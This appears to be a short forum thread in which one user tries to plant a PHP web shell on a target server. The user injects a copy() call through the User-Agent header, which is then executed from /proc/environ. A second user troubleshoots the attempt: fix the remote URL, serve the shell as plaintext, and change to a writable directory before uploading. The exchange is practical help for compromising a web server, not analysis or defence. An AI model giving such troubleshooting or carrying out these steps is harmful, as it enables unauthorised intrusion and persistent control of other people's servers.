i've got error - Warning: copy(www.somesite.com/shell.php) [function.copy]: failed to open stream: No such file or directory in /proc/178928/environ on line 1
↑
When i tried to load shell with User-Agent
i've got error - Warning
: copy( www.somesite.com/shell.php
) [ function.copy
]: failed to open stream: No such file or directory in /proc/178928/environ
on line 1
Change www. to http://www. and make sure the webshell is served in plaintext, not as a rendered html page.
↑
the same error: Warning
: copy(1.php) [ function.copy
]: failed to open stream: Permission denied in /proc/383125/environ
on line 1
It's not the same error. It means the webserver user doesn't have write permissions to the current directory. You've gotta find a writable directory and chdir to it before making upload requests.